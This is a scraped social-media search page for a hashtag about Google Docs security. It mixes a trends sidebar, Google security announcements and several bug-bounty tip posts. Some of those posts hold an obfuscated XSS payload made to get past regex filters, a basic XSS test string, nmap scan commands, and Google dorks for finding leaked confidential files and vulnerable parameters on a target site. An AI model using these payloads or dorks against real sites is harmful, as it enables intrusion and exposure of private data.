#isgoogledocumentsecure resultados de búsqueda
🚀 Exciting News! 🚀 I've just conquered the Twister machine in my OSCP journey! #Day7🕵️♂️💻 👨💻 Now, I'm sharing my code and notes to help You!!🎯 🔗 Check out ==-Nmap==== nmap -p- -sT -sV -A $IP nmap -p- -sC -sV $IP --0pen nmap -p- --script=vuln $IP ###HTTP-Methods nmap…
A XSS payload with Alert Obfuscation, for bypass RegEx filters <img src="X" onerror=top[8680439..toString(30)](1337)> <script>top[8680439..toString(30)](1337)</script> #infosec #cybersec #bugbountytip #BugBounty
Google Dork - XSS Prone Parameters 🔥 site:example[.]com inurl:q= | inurl:s= | inurl:search= | inurl:query= | inurl:keyword= | inurl:lang= inurl:& Test for XSS in param value: '"><img src=x onerror=alert()>
Just don’t type in anything remotely strange.. I searched for one of my photos saved in Google Photos that contains the text “Please Don’t” and got this response. Unbelievable.
Keep your filters bright and your guard up. Secure your selfies with these steps: g.co/tips/edu10 #GoogleEdu
Google Dorks - Vulnerable Parameters XSS, Open Redirect, SQLi, SSRF, LFI, RCE 🧵
We've addressed the issue with a phishing email claiming to be Google Docs. If you think you were affected, visit g.co/SecurityCheckup.
Google Dork - Cloud File Shares ☁️ site:drive.google.com "example[.]com" site:docs.google.com inurl:"/d/" "example[.]com" site:dropbox.com/s "example[.]com" Find exposed files linked to your target.
Google Dork - Sensitive Docs 📄 ext:txt | ext:pdf | ext:xml | ext:xls | ext:xlsx | ext:ppt | ext:pptx | ext:doc | ext:docx intext:“confidential” | intext:“Not for Public Release” | intext:”internal use only” | intext:“do not distribute” site:example[.]com Discover internal…
We’re expanding our AI-powered phishing protections to more products. Soon, we’ll automatically alert you if we detect a suspicious link in Google Docs, Sheets or Slides — and then take you back to safety. #GoogleIO
Hiding Malware Inside Images on GoogleUserContent : blog.sucuri.net/2018/07/hiding… , Ref* - Malware Hidden Inside JPG EXIF Headers : blog.sucuri.net/2013/07/malwar…
As an AppSec Engineer, reviewing an API spec for profile pic uploads: /api/v1/users/<user_id>/profile_picture (multipart/form-data). Access: authenticated user or admin only. Without controls, here are 3 vulnerabilities:
I've submitted a bug report to Google about this; unfortunately they closed it as 'Working as Intended' and explained that they don't consider it a security bug. Obviously I disagree - but until they change their mind, be on the lookout for deceptive security alerts from Google.
the protection link requires urls and pictures so you can copy all the links and save the pics in this form👇🏼 and fill in the sections docs.google.com/document/d/1-T…
2. Open PDF and text images as a text document It is annoying when you get documents that you have to edit in PDF formats. A hidden Google Drive hack solves this problem. Upload the PDF or image file in Google Drive and open it with Google Docs.
Something went wrong.
Something went wrong.
United States Trends
- 1. Good Thursday 21.7K posts
- 2. Lakers 80.2K posts
- 3. #Talus_Labs N/A
- 4. Luka 71.1K posts
- 5. Marcus Smart 6,328 posts
- 6. Wemby 27.4K posts
- 7. #LakeShow 5,784 posts
- 8. #AmphoreusStamp 7,429 posts
- 9. Blazers 9,095 posts
- 10. Russ 11.3K posts
- 11. Richard 46.2K posts
- 12. Ayton 16.9K posts
- 13. Unplanned 5,824 posts
- 14. #dispatch 65.9K posts
- 15. Podz 2,449 posts
- 16. Shroud 5,786 posts
- 17. Nico Harrison 2,067 posts
- 18. Fire Nico 1,102 posts
- 19. Bronny 5,470 posts
- 20. #Survivor49 3,474 posts